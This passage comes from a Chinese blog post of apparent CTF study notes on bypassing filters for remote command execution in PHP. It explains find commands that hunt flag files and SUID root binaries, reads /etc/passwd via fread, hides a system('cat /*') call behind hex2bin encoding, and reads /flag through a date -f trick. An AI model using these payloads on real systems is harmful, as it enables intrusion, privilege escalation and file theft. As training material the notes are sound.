<figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs q"><span class="hljs-built_in">system</span>(&#x27;find / -<span class="hljs-built_in">type</span> f -name <span class="hljs-string">&quot;*flag*&quot;</span> <span class="hljs-number">2</span>&gt;/<span class="hljs-built_in">dev</span>/<span class="hljs-built_in">null</span>&#x27;);<br></code></pre></td></tr></table></figure>

<ol>
<li><code>find</code> - 这是 Unix&#x2F;Linux 系统中用于搜索文件的命令</li>
<li><code>/</code> - 指定搜索的起始目录，这里是根目录，表示搜索整个文件系统</li>
<li><code>-type f</code> - 限制只搜索普通文件（不包括目录、设备文件等）<ul>
<li><code>f</code> 表示 regular file（普通文件）</li>
</ul>
</li>
<li><code>-name &quot;*flag*&quot;</code> - 指定要搜索的文件名模式<ul>
<li><code>*flag*</code> 表示文件名中包含 “flag” 这个词（前后可以有任意字符）</li>
<li>例如：flag.txt、my_flag_file、flag_backup 等都会被匹配</li>
</ul>
</li>
<li><code>2&gt;/dev/null</code> - 错误输出重定向<ul>
<li><code>2&gt;</code> 表示将标准错误输出(stderr)重定向</li>
<li><code>/dev/null</code> 是一个特殊设备，会丢弃所有写入它的数据</li>
<li>这样做的目的是隐藏所有错误消息（如权限不足无法访问某些目录等）</li>
</ul>
</li>
</ol>
</li>
</ul>
<h4 id="2-user-root"><a href="#2-user-root" class="headerlink" title="2. -user root"></a><strong>2. <code>-user root</code></strong></h4><ul>
<li><strong>作用</strong>：只查找属主（owner）是 <strong>root</strong> 的文件。</li>
<li><strong>为什么限制 root</strong>：因为 SUID 文件如果是 root 所有，运行时可以获取 root 权限，可能存在提权风险。</li>
</ul>
<h4 id="3-perm-4000"><a href="#3-perm-4000" class="headerlink" title="3. -perm -4000"></a><strong>3. <code>-perm -4000</code></strong></h4><ul>
<li><strong>作用</strong>：查找设置了 <strong>SUID 位（Set User ID）</strong> 的文件。</li>
<li><strong>SUID 是什么</strong>：<ul>
<li>当普通用户执行 SUID 文件时，该程序会以 <strong>文件所有者（root）的权限</strong> 运行。</li>
<li>例如：<code>/bin/passwd</code> 是 SUID 文件，普通用户修改密码时临时获得 root 权限。</li>
</ul>
</li>
<li><strong><code>-4000</code> 的含义</strong>：<ul>
<li><code>4</code> 代表 SUID 标志（<code>chmod u+s</code> 设置的权限）。</li>
<li><code>-</code> 表示 <strong>至少</strong> 要有 SUID 位（可能还有其他权限）。</li>
</ul>
</li>
</ul>
<h4 id="4-print"><a href="#4-print" class="headerlink" title="4. -print"></a><strong>4. <code>-print</code></strong></h4><ul>
<li><strong>作用</strong>：打印匹配的文件路径（默认行为，可省略）。</li>
</ul>
<h4 id="5-2-dev-null"><a href="#5-2-dev-null" class="headerlink" title="5. 2&gt;/dev/null"></a><strong>5. <code>2&gt;/dev/null</code></strong></h4><ul>
<li><strong>作用</strong>：将错误信息（如 <code>Permission denied</code>）丢弃，避免干扰结果。</li>
<li><strong>为什么需要</strong>：普通用户运行 <code>find /</code> 时，很多系统目录无权限访问，会报错。</li>
</ul>
<h4 id="6-1-txt"><a href="#6-1-txt" class="headerlink" title="6. &gt;1.txt"></a><strong>6. <code>&gt;1.txt</code></strong></h4><ul>
<li><strong>作用</strong>：将标准输出（即找到的文件列表）重定向到 <code>1.txt</code> 文件，而不是显示在终端。</li>
</ul>
<h2 id="程序执行-当作php代码执行"><a href="#程序执行-当作php代码执行" class="headerlink" title="程序执行(当作php代码执行)"></a>程序执行(当作php代码执行)</h2><p>readfile 文件读取</p>
<p>fread(fopen(‘&#x2F;etc&#x2F;passwd’,’r’),100);</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">aaa</span>=hex2bin(<span class="hljs-string">&#x27;73797374656D&#x27;</span>)(hex2bin(<span class="hljs-string">&#x27;636174202f2a&#x27;</span>))<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p>hex2bin(‘参数’); 转换十六进制字符串为二进制字符串</p>
<p>&#x2F;bin&#x2F;date -f&#x2F;flag 2&gt;1.txt</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>RCE（任意命令执行）绕过</div>
      <div>http://example.com/2025/04/06/RCE（任意命令执行）绕过/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>everythingis-ok</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年4月6日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/04/06/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9F%BA%E7%A1%80/" title="php反序列化基础">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">php反序列化基础</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/04/06/Linux%E5%B8%B8%E8%A7%81%E6%96%87%E4%BB%B6%E5%92%8C%E7%9B%AE%E5%BD%95%E6%93%8D%E4%BD%9C%E5%91%BD%E4%BB%A4/" title="Linux常见文件和目录操作命令">
                        <span class="hidden-mobile">Linux常见文件和目录操作命令</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
